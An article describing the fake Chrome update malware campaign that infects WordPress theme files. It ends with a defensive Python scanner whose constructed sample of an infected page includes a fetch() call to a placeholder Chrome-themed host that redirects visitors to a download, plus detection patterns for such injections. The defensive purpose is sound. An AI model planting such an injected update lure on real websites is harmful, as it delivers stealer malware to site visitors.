Amid the constantly evolving realm of cybersecurity, a persistent menace rears its head in the form of a deceptive fake Chrome update. This fraudulent software, posing as a legitimate browser update, remains active and continues to pose a significant threat to unsuspecting users.
The fake Chrome update is more than it seems, as it operates as a Remote Access Trojan (RAT) that can gain control of your computer. Often serving as the initial step in a ransomware attack, this malware can lead to substantial financial losses and data breaches.
Cybersecurity experts have discovered a fresh variant of this malware, dubbed “FakeUpdateRU” by Jerome Segura of Malwarebytes. Notably, it is distinct from the earlier SocGholish malware, which signals that a different hacker group is capitalizing on the growing demand for ransomware attacks.
Numerous similar groups have emerged recently, prompting a swift response from Google. The tech giant has taken action to block most websites distributing this malware, displaying warning pages if users attempt to access them. The malware manipulates the main index[.]php file of website themes, closely mimicking the appearance of an authentic Chrome update page.
What sets the fake Chrome update apart is its use of plain HTML code sourced from the UK English version of Google’s website. This suggests that the hackers used a Chrome (Chromium-based) browser to save the page and craft the malware, which left Russian words in the files; those words are present regardless of which browser the visitor uses.
The malware’s true danger lies in the JavaScript code at the bottom of the fraudulent update page. This code initiates the malware download when users click the “Update” button, using a Chrome-themed domain to acquire the final download URL, typically on another compromised website. The malware is associated with the Zgrat and Redline Stealer malware families, both known for their involvement in ransomware attacks.
Crucially, the fake update pages and the malware files are hosted on different hacked websites. Hackers employ multiple domains with similar names to redirect users to the malware .ZIP file, continually changing and registering them to maintain the scale of their malicious campaign.
To identify infected websites, users can search for a specific Google Tag Manager script, offering insight into the extent of the threat. In response to Google’s swift action in blocking domains that redirect users, hackers have adapted their tactics by linking directly to downloads on other compromised websites. This necessitates the reinfection of numerous sites, rather than altering a single file on their server.
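As an added illustration of the kind of check a site owner could run on theme files (this is example code written for this article, not a tool from Google, Malwarebytes or the researchers), the following Python function scans a theme index.php for the traits described above: script tags loading from hosts outside the site’s own domains, inline JavaScript that contacts a Chrome-themed host, and page text posing as a Chrome update prompt. The sample HTML and the host names in it are constructed placeholders; an external script host such as a tag manager is a lead to review, not proof of compromise.

```python
import re
from urllib.parse import urlparse

# Constructed sample of an injected theme index.php (not a real captured page).
SAMPLE_INFECTED = """<?php get_header(); ?>
<div id="update-page"><h1>Update Google Chrome</h1>
<button id="update-btn">Update</button></div>
<script src="https://www.googletagmanager.com/gtm.js?id=GTM-PLACEHOLDER"></script>
<script>
document.getElementById('update-btn').onclick = function () {
  fetch('https://chrome-update-placeholder.invalid/get')
    .then(r => r.text()).then(u => location.href = u);
};
</script>
<?php get_footer(); ?>
"""

# Constructed clean theme file for comparison.
SAMPLE_CLEAN = """<?php get_header(); ?>
<main><?php the_content(); ?></main>
<script src="https://example.com/wp-content/themes/mytheme/js/main.js"></script>
<?php get_footer(); ?>
"""

SCRIPT_SRC = re.compile(r'<script[^>]+src=["\']([^"\']+)["\']', re.I)
INLINE_SCRIPT = re.compile(r'<script(?![^>]*src=)[^>]*>(.*?)</script>', re.I | re.S)
URL_IN_JS = re.compile(r'https?://([A-Za-z0-9.-]+)')


def scan_theme_index(html, site_domains):
    """Return a list of findings for one theme file; empty list means nothing suspicious."""
    findings = []
    # 1. Script tags that load code from hosts the site does not own.
    for src in SCRIPT_SRC.findall(html):
        host = (urlparse(src).hostname or '').lower()
        if host and host not in site_domains:
            findings.append(f'external script src: {host}')
    # 2. Inline script bodies that reach out to a Chrome-themed host.
    for body in INLINE_SCRIPT.findall(html):
        for host in sorted({h.lower() for h in URL_IN_JS.findall(body)}):
            if 'chrome' in host and host not in site_domains:
                findings.append(f'inline script contacts Chrome-themed host: {host}')
    # 3. Page copy that mimics a browser update prompt, only reported alongside a script finding.
    if findings and re.search(r'update\s+(google\s+)?chrome', html, re.I):
        findings.append('page text mimics a Chrome update prompt')
    return findings
```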
To guard against this fake-update malware, experts recommend keeping plugins and themes updated, hardening WordPress websites, and maintaining regular data backups.